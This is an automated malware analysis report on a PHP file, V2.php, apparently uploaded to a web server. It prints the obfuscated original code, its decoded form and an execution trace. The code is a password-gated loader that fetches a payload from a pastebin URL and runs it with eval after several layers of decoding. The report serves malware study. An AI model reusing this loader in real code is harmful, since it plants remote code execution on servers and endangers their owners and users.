PHP Malware Analysis
V2.php
md5: 9432c7f167aaf04d7a9e05de01599995
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Deobfuscated, Original, Traces)
Execution
- eval (Deobfuscated, Original, Traces)
Files
- file_get_contents (Deobfuscated, Traces)
URLs
- http://pastebin.com/raw/W9ZcmJHk (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
$auth_pass = "48ba8138756afc71fa1b3c37fa27d2a5";
// default: V2
eval /* PHPDeobfuscator eval output */ {
$noname = file_get_contents('http://pastebin.com/raw/W9ZcmJHk');
eval(str_rot13(gzinflate(str_rot13(base64_decode($noname)))));
};Execution traces
data/traces/9432c7f167aaf04d7a9e05de01599995_trace-1676242154.8764.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:49:40.774210]
1 0 1 0.000224 393464
1 3 0 0.000283 393680 {main} 1 /var/www/html/uploads/V2.php 0 0
1 A /var/www/html/uploads/V2.php 2 $auth_pass = '48ba8138756afc71fa1b3c37fa27d2a5'
2 4 0 0.000317 393680 base64_decode 0 /var/www/html/uploads/V2.php 3 1 'JG5vbmFtZSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9XOVpjbUpIaycpOw0KZXZhbChzdHJfcm90MTMoZ3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCRub25hbWUpKSkpKTs='
2 4 1 0.000340 393936
2 4 R '$noname = file_get_contents(\'http://pastebin.com/raw/W9ZcmJHk\');\r\neval(str_rot13(gzinflate(str_rot13(base64_decode($noname)))));'
2 5 0 0.000390 395640 eval 1 '$noname = file_get_contents(\'http://pastebin.com/raw/W9ZcmJHk\');\r\neval(str_rot13(gzinflate(str_rot13(base64_decode($noname)))));' /var/www/html/uploads/V2.php 3 0
3 6 0 0.000409 395640 file_get_contents 0 /var/www/html/uploads/V2.php(3) : eval()'d code 1 1 'http://pastebin.com/raw/W9ZcmJHk'
3 6 1 0.073878 398816
3 6 R FALSE
2 A /var/www/html/uploads/V2.php(3) : eval()'d code 1 $noname = FALSE
3 7 0 0.073932 398776 base64_decode 0 /var/www/html/uploads/V2.php(3) : eval()'d code 2 1 FALSE
3 7 1 0.073948 398840
3 7 R ''
3 8 0 0.073962 398808 str_rot13 0 /var/www/html/uploads/V2.php(3) : eval()'d code 2 1 ''
3 8 1 0.073976 398840
3 8 R ''
3 9 0 0.073988 398776 gzinflate 0 /var/www/html/uploads/V2.php(3) : eval()'d code 2 1 ''
3 9 1 0.074010 398808
3 9 R FALSE
3 10 0 0.074023 398776 str_rot13 0 /var/www/html/uploads/V2.php(3) : eval()'d code 2 1 FALSE
3 10 1 0.074036 398808
3 10 R ''
2 5 1 0.074051 398808
1 3 1 0.074059 396960
0.074092 317392
TRACE END [2023-02-12 20:49:40.848120]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php
$auth_pass = "48ba8138756afc71fa1b3c37fa27d2a5"; // default: V2
eval(base64_decode(("JG5vbmFtZSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9XOVpjbUpIaycpOw0KZXZhbChzdHJfcm90MTMoZ3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCRub25hbWUpKSkpKTs=")));